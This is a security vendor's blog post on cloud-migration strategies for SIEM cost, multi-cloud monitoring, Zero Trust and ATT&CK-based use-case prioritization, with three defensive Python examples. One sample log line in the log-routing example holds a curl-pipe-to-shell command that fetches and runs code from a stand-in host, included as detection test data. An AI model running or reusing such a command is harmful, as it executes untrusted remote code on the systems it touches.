Cloud-native infrastructure holds the promise of greater ease of deployment and faster time to value. It has elasticity built-in and leverages cloud speed. Moreover, cloud-native infrastructure has the potential to be more budget friendly – allowing enterprises to scale their financial investments to the resources they require, by using a software-as-a-service (SaaS) model.
At the same time, enterprises migrating their workloads and infrastructure to cloud-native architectures face a wide variety of challenges, not the least of which is handling Big Data: very large volumes of logs coming from new data sources such as Virtual Machines (VMs), SaaS applications, containers, and other cloud-native resources.
Moreover, cloud migration means adopting a completely new operational model for infrastructure. New asset types need to be tracked and managed, and their associated vulnerabilities need to be addressed.
The Challenge: Higher Costs & Data Overload
Cloud-native security analytics solutions like Microsoft Sentinel can ingest vast amounts of data at cloud speed and scale, supported by numerous data connectors that cover the velocity, variety, veracity and value of the data. A cloud-native Security Information & Event Management (SIEM) platform simplifies integrating security data from multiple cloud environments, enhancing security analytics capabilities.
These far greater quantities of data can also lead to higher costs, because a cloud SIEM is billed on the volume of data ingested and retained. Moreover, “data overload” can result. Without the right strategy in place, cloud migration can be likened to a miner standing on a goldmine without a shovel: “data overload” raises the risk of security analysts losing sight of the key insights.
These challenges can be addressed by implementing strategies that optimize the organization’s threat monitoring capabilities while simultaneously keeping costs low.
Let’s look at 4 strategies for optimization that are key for any enterprise undergoing cloud migration:
- Reducing the Cost of Log Ingestion & Storage
The difficulties of managing Big Data, on the one hand – while keeping costs down, on the other hand – can be approached by means of a well-defined data collection and pre-processing strategy. Advanced data collection solutions can be used to optimize data collection by means of data tagging, filtering, custom parsing, indexing, aggregation, and targeted routing to the data storage & analytics workspace.
To enable this, a robust data collection layer is needed, one that supports a variety of collection methods such as syslog, database event pull, API, text files and more.
The recommended approach is to:
- First, securely collect and stream all available data, leveraging the advanced data collection infrastructure.
- Then, store the data in optimized storage options such as Microsoft Azure Data Explorer (ADX).
- Finally, route only the higher-value data into Microsoft Sentinel for real-time threat analytics.
In this way, you do not compromise on the ability to collect and store data, and you can still use the full data set for custom visualizations, reporting, hunting and ad-hoc querying. Only the high-value subset is used for real-time correlation and analytics, so you keep the real-time threat insights while reducing the costs of log ingestion and storage.
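A minimal version of this three-step pipeline, as an added example that is not CyberProof's or Microsoft's code: each raw line is parsed and tagged, noise is aggregated into counts before archiving, everything lands in a cheap archive tier (the ADX role), and only the tagged high-value events are forwarded to the analytics tier (the Sentinel role). The sample log lines, the rule names and the two tiers modelled as plain lists are constructed for illustration.

```python
"""Tiered log routing: tag every event, archive all of it cheaply and
forward only high-value events to the real-time analytics tier.

Added example, not CyberProof's or Microsoft's code. The archive tier
(standing in for an ADX table) and the analytics tier (standing in for a
Sentinel workspace) are plain lists; the sample log lines and the
tagging rules are constructed for illustration."""
import json
import re
from collections import Counter

# RFC 3164-style syslog line: <PRI>timestamp host app[pid]: message
SYSLOG_RE = re.compile(
    r"^<(?P<pri>\d+)>(?P<ts>\S+) (?P<host>\S+) (?P<app>[\w.\-/]+)(?:\[\d+\])?: (?P<msg>.*)$"
)

# Constructed sample input: syslog from a VM, JSON from a SaaS identity
# provider and from a container runtime. Not real data.
SAMPLE_LINES = [
    "<86>2024-05-01T10:00:01Z vm-web-01 sshd[1201]: Failed password for root from 203.0.113.7 port 5122 ssh2",
    "<86>2024-05-01T10:00:02Z vm-web-01 sshd[1201]: Failed password for root from 203.0.113.7 port 5123 ssh2",
    "<30>2024-05-01T10:00:03Z vm-web-01 healthd[44]: heartbeat ok",
    "<30>2024-05-01T10:00:04Z vm-web-01 healthd[44]: heartbeat ok",
    "<30>2024-05-01T10:00:05Z vm-web-01 healthd[44]: heartbeat ok",
    '{"source":"saas-idp","event":"RoleAssigned","actor":"alice","target":"bob","role":"GlobalAdmin","ts":"2024-05-01T10:00:06Z"}',
    '{"source":"container","event":"exec","pod":"payments-7f","cmd":"/bin/sh -c curl http://198.51.100.9/x | sh","ts":"2024-05-01T10:00:07Z"}',
    '{"source":"container","event":"log","pod":"payments-7f","msg":"GET /health 200","ts":"2024-05-01T10:00:08Z"}',
]

# Hypothetical tagging rules. High-value events go to both tiers; noise is
# aggregated into counts before it reaches the archive.
HIGH_VALUE_RULES = {
    "auth_failure": lambda r: r.get("app") == "sshd" and "Failed password" in r.get("msg", ""),
    "privilege_change": lambda r: r.get("event") == "RoleAssigned",
    "container_exec": lambda r: r.get("source") == "container" and r.get("event") == "exec",
}
NOISE_RULES = {
    "heartbeat": lambda r: "heartbeat" in r.get("msg", ""),
    "http_health": lambda r: r.get("event") == "log" and "/health" in r.get("msg", ""),
}


def parse(line):
    """Normalize one raw line into a flat dict; unparseable lines are kept as raw."""
    line = line.strip()
    if line.startswith("{"):
        rec = json.loads(line)
        rec.setdefault("source", "json")
        return rec
    m = SYSLOG_RE.match(line)
    if not m:
        return {"source": "unparsed", "event": "raw", "msg": line}
    pri = int(m.group("pri"))  # PRI = facility * 8 + severity
    return {"source": "syslog", "facility": pri >> 3, "severity": pri & 7,
            "ts": m.group("ts"), "host": m.group("host"), "app": m.group("app"),
            "event": m.group("app"), "msg": m.group("msg")}


def tag(rec):
    """Attach matching rule names and decide the tier; high value wins over noise."""
    rec["tags"] = [name for name, pred in HIGH_VALUE_RULES.items() if pred(rec)]
    rec["noise"] = [] if rec["tags"] else [name for name, pred in NOISE_RULES.items() if pred(rec)]
    rec["tier"] = "analytics" if rec["tags"] else "archive"
    return rec


def route(lines):
    """Return (archive, analytics). The archive holds everything (noise as
    counts); analytics holds only the tagged high-value subset."""
    archive, analytics = [], []
    noise_counts = Counter()
    for line in lines:
        rec = tag(parse(line))
        if rec["noise"]:
            origin = rec.get("host") or rec.get("pod") or "unknown"
            noise_counts[(origin, rec["noise"][0])] += 1
            continue
        archive.append(rec)
        if rec["tier"] == "analytics":
            analytics.append(rec)
    for (origin, kind), n in sorted(noise_counts.items()):
        archive.append({"source": "aggregated", "event": kind, "origin": origin,
                        "count": n, "tier": "archive"})
    return archive, analytics


def analytics_fraction(lines):
    """Share of raw lines that actually reach the billed analytics tier."""
    _, analytics = route(lines)
    return len(analytics) / len(lines)


if __name__ == "__main__":
    archive, analytics = route(SAMPLE_LINES)
    print(f"{len(SAMPLE_LINES)} raw lines -> {len(archive)} archive records, {len(analytics)} analytics records")
    for rec in analytics:
        print(" analytics:", rec["tags"], rec.get("msg") or rec.get("cmd") or rec.get("role"))
```

Run stand-alone, it reports that the 8 raw lines become 6 archive records and 4 analytics records, so half of the raw volume never reaches the billed tier. In a real deployment the tagging rules would live in the collection layer (a forwarder's routing configuration, for example) rather than in application code, but the shape is the same: archive everything, forward by tag.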
- Monitoring Across Multiple Clouds & Locations
Many enterprises today leverage a multi-cloud environment and manage their cloud resources & workloads in specific locations – and there are good reasons for doing so. For example, a typical enterprise-level organization might leverage the best capabilities of different environments:
- Providing a custom application development & hosting environment for developers in AWS
- Utilizing the Azure environment for cloud computing, workplace collaboration, and productivity
- Leveraging Google for data warehousing and cloud analytics
The data and resources in each of these environments need to be monitored where they reside.
The security situation is further complicated by the fact that the data for each of these clouds may be stored in multiple locations. This may be done to meet various business requirements, including processing data locally and filtering out sensitive data, as well as to align with regulatory requirements. As a result, an enterprise typically has multiple cloud instances: multiple accounts in AWS, projects in Google Cloud, or tenants and subscriptions in Azure.
Each location is likely to have its own management policies. The question therefore is how to maintain effective monitoring across multiple clouds, each with its own query languages, log schemas, and standards, and bring it all together into a single view.
A cloud-native SIEM provides the solution, supporting integration across all cloud providers – offering a centralized, consolidated view of threats by monitoring data wherever it may be. Moreover, a centralized data lake such as ADX, which is designed to handle Big Data, facilitates cost-effective management across multiple clouds and locations. Today, advanced Managed Detection & Response (MDR) providers like CyberProof, a UST company are offering this kind of multiple, overlapping security monitoring capability.
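One way to get to that single view, as an added example and not Sentinel's or CyberProof's code: normalize each cloud's native audit record into a common schema and write the detection once against that schema. The three records are constructed to resemble an AWS CloudTrail event, an Azure Activity Log event and a GCP Cloud Audit Log entry, trimmed to the fields used; the unified field names and the cross-cloud privilege-grant rule are assumptions of this example, and the identities and IP address are fictitious.

```python
"""Normalizing audit events from three clouds into one schema so that a
single detection can run across all of them.

Added example, not Microsoft Sentinel's or CyberProof's code. The three
events are constructed to resemble an AWS CloudTrail record, an Azure
Activity Log record and a GCP Cloud Audit Log entry, trimmed to the
fields used here. The unified field names (cloud, time, actor, source_ip,
action, target, outcome) are an assumption of this example, not a
published schema."""
from collections import defaultdict
from datetime import datetime, timedelta

AWS_EVENT = {  # CloudTrail shape (constructed)
    "eventVersion": "1.08", "eventTime": "2024-05-01T09:12:44Z",
    "eventSource": "iam.amazonaws.com", "eventName": "AttachUserPolicy",
    "awsRegion": "us-east-1", "sourceIPAddress": "198.51.100.23",
    "userIdentity": {"type": "IAMUser", "arn": "arn:aws:iam::123456789012:user/alice"},
    "requestParameters": {"userName": "bob",
                          "policyArn": "arn:aws:iam::aws:policy/AdministratorAccess"},
}
AZURE_EVENT = {  # Activity Log shape (constructed)
    "time": "2024-05-01T09:13:02Z", "category": "Administrative", "resultType": "Success",
    "operationName": "Microsoft.Authorization/roleAssignments/write",
    "caller": "alice@example.com", "callerIpAddress": "198.51.100.23",
    "resourceId": "/subscriptions/11111111-2222-3333-4444-555555555555/providers/Microsoft.Authorization/roleAssignments/9e1b",
}
GCP_EVENT = {  # Cloud Audit Log shape (constructed)
    "timestamp": "2024-05-01T09:13:40Z",
    "logName": "projects/analytics-prod/logs/cloudaudit.googleapis.com%2Factivity",
    "protoPayload": {
        "serviceName": "cloudresourcemanager.googleapis.com", "methodName": "SetIamPolicy",
        "resourceName": "projects/analytics-prod",
        "authenticationInfo": {"principalEmail": "alice@example.com"},
        "requestMetadata": {"callerIp": "198.51.100.23"},
    },
}

# Privilege-granting actions, expressed in each cloud's own vocabulary.
PRIVILEGE_GRANTS = {
    "iam.amazonaws.com:AttachUserPolicy",
    "Microsoft.Authorization/roleAssignments/write",
    "cloudresourcemanager.googleapis.com:SetIamPolicy",
}


def from_cloudtrail(e):
    params = e.get("requestParameters") or {}
    return {"cloud": "aws", "time": e["eventTime"], "actor": e["userIdentity"]["arn"],
            "source_ip": e["sourceIPAddress"],
            "action": f'{e["eventSource"]}:{e["eventName"]}',
            "target": params.get("policyArn") or params.get("userName", ""),
            "outcome": "failure" if "errorCode" in e else "success"}


def from_azure_activity(e):
    return {"cloud": "azure", "time": e["time"], "actor": e["caller"],
            "source_ip": e["callerIpAddress"], "action": e["operationName"],
            "target": e["resourceId"],
            "outcome": "success" if e.get("resultType") == "Success" else "failure"}


def from_gcp_audit(e):
    p = e["protoPayload"]
    failed = bool((p.get("status") or {}).get("code"))  # non-zero status.code means error
    return {"cloud": "gcp", "time": e["timestamp"],
            "actor": p["authenticationInfo"]["principalEmail"],
            "source_ip": p["requestMetadata"]["callerIp"],
            "action": f'{p["serviceName"]}:{p["methodName"]}',
            "target": p["resourceName"], "outcome": "failure" if failed else "success"}


def normalize(raw_events):
    """Pick a normalizer from the record's own shape; unknown shapes are skipped."""
    out = []
    for e in raw_events:
        if "eventVersion" in e and "eventSource" in e:
            out.append(from_cloudtrail(e))
        elif "protoPayload" in e:
            out.append(from_gcp_audit(e))
        elif "operationName" in e and "caller" in e:
            out.append(from_azure_activity(e))
    return out


def parse_ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ")


def cross_cloud_privilege_grants(events, window_minutes=15):
    """One detection over the unified schema: a source IP that successfully
    granted privileges in more than one cloud within the window."""
    by_ip = defaultdict(list)
    for ev in events:
        if ev["action"] in PRIVILEGE_GRANTS and ev["outcome"] == "success":
            by_ip[ev["source_ip"]].append(ev)
    flagged = {}
    for ip, evs in by_ip.items():
        times = sorted(parse_ts(ev["time"]) for ev in evs)
        clouds = sorted({ev["cloud"] for ev in evs})
        if len(clouds) > 1 and times[-1] - times[0] <= timedelta(minutes=window_minutes):
            flagged[ip] = clouds
    return flagged


if __name__ == "__main__":
    unified = normalize([AWS_EVENT, AZURE_EVENT, GCP_EVENT])
    for ev in unified:
        print(ev["cloud"], ev["time"], ev["actor"], ev["action"])
    print(cross_cloud_privilege_grants(unified))
```

The point of the normalizers is that the detection at the bottom never mentions CloudTrail, Activity Log or protoPayload: once `actor`, `source_ip`, `action` and `outcome` mean the same thing everywhere, the same rule sees one operator granting admin rights in all three clouds from one address within a minute, which no single cloud's console would show.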
- Implementing Zero Trust
Zero Trust refers to the continuous validation of access at all steps of a digital interaction. It means providing each user with minimal required access or capabilities, while offering access from any location and providing endpoint detection, identity protection, and vulnerability management per device.
Because Zero Trust is complex, it involves more sophisticated asset management, which requires that an enterprise maintain full visibility of its assets. Visibility is essential to establishing the right level of security control and monitoring all the assets through threat detection & response, threat intelligence, and vulnerability management.
But how do you maintain this level of control with the exponentially greater quantities of information associated with a cloud-native environment? The answer involves quantifying risk based on an in-depth understanding of exactly what you’re looking for.
If cybersecurity in a cloud-native environment must operate from a risk-based approach, then the first step in evaluating risk is identifying which threats and threat actors pose the greatest risk to a particular enterprise. Each organization must map out its assets, then evaluate (1) what types of threats these assets are likely to face, and (2) which threat actors are most likely to attack. To be effective, this assessment must be based on high-quality Cyber Threat Intelligence (CTI) input that relates to a wide variety of parameters specific to the enterprise, including:
- Data type
- Who has received access
- Prioritizing Risk with the MITRE Framework
Once you have evaluated the types of threats and threat actors that an enterprise is likely to face, you can prioritize threat detection & response capabilities using a framework such as MITRE’s Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK) framework.
The ATT&CK framework is a curated knowledge base of adversary tactics and techniques observed in real-world intrusions, and it links each technique with:
- Threat groups that are known to use it
- The specific procedures those groups use to carry it out
- The mitigations and detection methods for identifying the technique
The beauty of the ATT&CK framework is that it provides direction for security teams making decisions related to developing their security operations center (SOC) strategy. More specifically, it helps ensure that use case development is continuously geared toward meeting the most likely threats to the business.
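A worked version of that prioritization, covering both the asset and threat-actor mapping described under Zero Trust and the ATT&CK alignment above, as an added example that is not CyberProof's Use Case Factory or anything published by MITRE: each technique is scored by the combined likelihood of the actors known to use it, weighted by how exposed the enterprise's mapped assets are to it and by the gap in existing detection coverage, and the use-case backlog is ordered by that score. The technique IDs and names are real ATT&CK Enterprise entries; the actor profiles, likelihoods, exposure weights and coverage figures are constructed placeholders for the CTI and asset inventory the text describes.

```python
"""Prioritizing detection use cases by ATT&CK technique: threat-actor
likelihood times asset exposure times the detection coverage gap.

Added example, not CyberProof's Use Case Factory or anything published by
MITRE. The technique IDs and names are real ATT&CK Enterprise entries;
the actor profiles, likelihoods, exposure weights and existing-coverage
scores are constructed for illustration and stand in for the CTI and
asset-inventory input the text describes."""

TECHNIQUES = {
    "T1078": "Valid Accounts", "T1566": "Phishing",
    "T1059": "Command and Scripting Interpreter", "T1003": "OS Credential Dumping",
    "T1021": "Remote Services", "T1486": "Data Encrypted for Impact",
    "T1110": "Brute Force", "T1098": "Account Manipulation",
    "T1530": "Data from Cloud Storage", "T1190": "Exploit Public-Facing Application",
}

# Hypothetical actor profiles: how likely each is to target this enterprise
# (0..1, from CTI) and which techniques it is known to use.
ACTORS = {
    "actor-a (ransomware affiliate)": {"likelihood": 0.7,
        "techniques": ["T1566", "T1078", "T1059", "T1003", "T1021", "T1486"]},
    "actor-b (cloud credential theft)": {"likelihood": 0.5,
        "techniques": ["T1078", "T1110", "T1098", "T1530"]},
    "actor-c (web exploitation)": {"likelihood": 0.3,
        "techniques": ["T1190", "T1059"]},
}

# Hypothetical exposure weights: how much of the mapped asset inventory a
# technique can reach (cloud identities and public apps weigh most here).
EXPOSURE = {"T1078": 1.0, "T1190": 0.8, "T1530": 0.9, "T1566": 0.7, "T1059": 0.6,
            "T1003": 0.5, "T1021": 0.5, "T1486": 0.9, "T1110": 0.6, "T1098": 0.8}

# Hypothetical existing detection coverage per technique (0 = none, 1 = full).
COVERAGE = {"T1566": 0.8, "T1059": 0.6, "T1110": 0.9}


def score_techniques(actors=ACTORS, exposure=EXPOSURE, coverage=COVERAGE):
    """Return [(technique_id, priority)] sorted high to low, where
    priority = (sum of likelihood over actors using it) * exposure * (1 - coverage)."""
    threat = {}
    for actor in actors.values():
        for tid in actor["techniques"]:
            threat[tid] = threat.get(tid, 0.0) + actor["likelihood"]
    ranked = []
    for tid, t in threat.items():
        gap = 1.0 - coverage.get(tid, 0.0)
        ranked.append((tid, round(t * exposure.get(tid, 0.5) * gap, 6)))
    return sorted(ranked, key=lambda x: (-x[1], x[0]))


def next_use_cases(n=3, **kw):
    """The n techniques the use-case backlog should tackle first, with names."""
    return [(tid, TECHNIQUES.get(tid, "unknown"), score)
            for tid, score in score_techniques(**kw)[:n]]


def coverage_after(new_detections, **kw):
    """Re-score after shipping detections, to show the backlog moving."""
    updated = dict(kw.get("coverage", COVERAGE))
    updated.update(new_detections)
    kw["coverage"] = updated
    return score_techniques(**kw)


if __name__ == "__main__":
    for tid, name, score in next_use_cases():
        print(f"{tid} {name:<36} {score:.3f}")
    print("top of backlog after covering T1078:", coverage_after({"T1078": 0.9})[0])
```

With these inputs Valid Accounts (T1078) lands on top because two of the three actors use it, it touches the most exposed assets and nothing detects it yet, while Phishing (T1566), which the most likely actor also uses, drops near the bottom because it is already well covered. Re-running the score after a detection ships (`coverage_after`) is the continuous-improvement loop: the backlog is re-ordered from the updated coverage, not from a fixed list.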
At CyberProof, for example, we optimize use case development using our Use Case Factory, which provides agile development of threat detection & response content and continuous improvement, to align with changing cyber trends and evolving threats.
Migrating to the Cloud? First – Address the Risks
While cloud-native infrastructure offers many benefits for enterprises over on-premises IT environments, it must be managed correctly to keep data ingestion costs down and mitigate cybersecurity risks. The drastic changes involved in migrating an enterprise to the cloud impact all aspects of security operations and create new risks and challenges for the team, which explains why cybersecurity asset management is currently such a hot topic.
Working with an advanced MDR provider gives you access to the expertise you need to explore, develop and implement strategies such as: reducing the cost of log ingestion & storage, monitoring multiple clouds and geolocations, implementing Zero Trust, and mitigating risk through use of a framework like the MITRE ATT&CK.
If you’re interested in speaking with Jaimon Thomas or another member of the team about optimizing cloud migration to reduce risk, contact CyberProof, a UST company.